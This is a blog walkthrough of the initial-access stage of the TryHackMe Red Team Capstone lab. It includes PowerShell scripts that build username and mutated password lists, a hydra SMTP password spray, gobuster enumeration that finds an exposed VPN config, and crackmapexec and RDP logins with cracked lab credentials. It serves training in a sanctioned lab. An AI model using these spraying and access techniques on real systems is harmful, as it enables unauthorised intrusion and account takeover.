TryHackMe Red Team Capstone Walkthrough, Part I: Initial Access
TL;DR walkthrough of the Red Team Capstone network on TryHackMe. This is Part I: Initial Access.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Our Red Team Capstone Walkthrough Series
There are four parts to this walkthrough of the Red Team Capstone due to the sheer size of the network:
- Part I: Initial Access
- Part II: Escalation to Domain Admin
- Part III: Escalation to Enterprise Admin & access to the internal banking app
- Part IV: How flag submission works in the Red Team Capstone
I will add a link to the last part once I post it. Currently it only exists in raw notes and screenshots.
Background
Overall I really liked this room. It’s one of the largest networks on TryHackMe, if not the largest by sheer VM count. There are 14 VMs in the Red Team Capstone total, however it is important to bear in mind that you do not have to compromise all of them to finish the room. The end goal of the Red Team Capstone is to
- Gain initial access to the internal domain
- Enumerate, escalate privileges, and move through the forest until finally
- Gaining access to the internal banking application.
Executing a “fraudulent” transaction on the banking application is the demonstration of impact and the end of the exercise.
On an admin note, bear in mind that the room is shared. Other TryHackMe users may be using the VMs at any given time. Hence you may get logged out of a RDP session on a VM because another THM user just connected using the same username you were. This happened to me once during my time completing this room. I simply worked on something else and came back later.
Also note that all the VMs use the same first 3 octets in their IP address. I didn’t put any flags in until the end, so my diagram looked like this the entire time. You may get different IPs when you do this room, however only the first 3 octets might change for you. The last octet is static.
I just ran the query
Get-ADComputer -Filter * -Properties * | Select-Object CN, IPv4Addressevery time I gained a foothold in another domain, then jotted down the hostnames and corresponding IPs in my notes.
As you might guess from the diagram, the room has
- A parent domain
- Two child domains
- Three public facing servers
- One internal web application that’s not joined to AD
I got some hints from Kesaya’s excellent Red Team Capstone writeup here while working on gaining initial access. Hence I feel it’s important to cite them.
Enumeration
I didn’t use nmap at all in the Red Team Capstone, after all the diagram lets you what three servers are available and what their roles are. Luckily I did not have to screw with any webapps to get initial access as I suck at webapps. I simply poked and prodded looking for
- A list of usernames to try
- A list of passwords to try
- Method of gaining internal access
The webserver has a ‘Contact Us’ page. This page has an email address that lets us know the format: applications@corp.thereserve.loc
The webserver also has a ‘Meet The Team’ page. Look at the source code of the page and you will notice that every image on that page has the file format ‘firstname.lastname.jpeg’. That looks an awful lot like their usernames doesn’t it?
I saved that webpage’s source to ‘meettheteam.txt’ and then whipped up two functions:
Generate-Usernames.ps1
Get-Content .\meettheteam.txt |
Select-String -Pattern '([a-z]+\.[a-z]+)\.jpeg' -AllMatches |
ForEach-Object {
$_.Matches.Value -replace '\.jpeg',''
} | Sort-Object -Unique |
Set-Content usernames.txtGenerate-Emails.ps1
$Lines = Get-Content .\usernames.txt
ForEach($Line in $Lines)
{
$Line + '@corp.thereserve.loc' | Out-File .\emails.txt -Append
}Great, now we have a list of usernames and another of email addresses. We just need passwords to try spraying.
The room materials give you a password base list and let you know to add 1 number and 1 special character from ‘!@#$%’ to the end of each base.
Generate-Passwords.ps1
Get-Content .capstone-challenge-resources-1682449700926\Capstone_Challenge_Resources\password_base_list.txt | ForEach-Object {
foreach ($n in 0..9) {
foreach ($s in '!','@','#','$','%') {
"$_${n}${s}"
}
}
} | Set-Content .\mutated.txtI was now ready to take our generated usernames and passwords and spray:
hydra -L emails.txt -P mutated.txt 10.200.89.11 smtp
I got two hits:
laura.wood \ Password1@
mohammed.ahmed \ Password1!
How do we get access to the internal network though? I found a *.ovpn file left publicly accessible when I tried running GoBuster against the VPN server.
gobuster dir -u http://10.200.89.12 -w /home/kali/Downloads/SecLists-master/Discovery/Web-Content/big.txt
I downloaded the corpUsername.ovpn file from http://10.200.89.12/vpn and opened it.
mousepad ../RedTeam/corpUsername.ovpnNotice that line 6 has the IP ’10.200.X.X’. I simply changed that to the VPN servers IP in the diagram: 10.200.89.12.
Access the internal network
Then I connected.
sudo openvpn ../RedTeam/corpUsername.ovpnI enumerated what changed after connecting.
ipconfig
route
Interesting, we are now connected to two networks over OpenVPN and the new one lists two IP addresses.
I saved 10.200.89.21 & 10.200.89.22 in IPs.txt and then tried the credentials we found against them. Remember the format for the email address we found on the webserver? That’s how to know what domain to try.
crackmapexec smb IPs.txt -u mohammad.ahmed -p 'Password1!' -d corp.thereserve.loc --continue-on-success
Foothold on a domain workstation
I connected to the first IP via RDP.
xfreerdp /u:mohammad.ahmed /p:'Password1!' +clipboard /dynamic-resolution /cert:ignore /v:10.200.89.21 /drive:share,/home/kali/Downloads/RedTeamWe have initial access to the internal domain as a Domain User.
Summary
This was a really good exercise in performing enumeration on public facing systems and putting together username and password lists for spraying. I give the room’s author a lot of credit here. Overall this was a really, really good room IMHO. I rate it much higher than I do the PT1 exam in fact.
Again, I’d like to thank Kesaya for their excellent writeup that has excellent hints.
This ends Part I: Gaining Initial Access. Part II: Escalating to Domain Admin in corp.thereserve.loc is next.
References
Kesaya’s writeup: https://7168674.fs1.hubspotusercontent-na1.net/hubfs/7168674/Red%20Team%20Capstone%20Network%20-%20Kesaya%20Write-Up.pdf
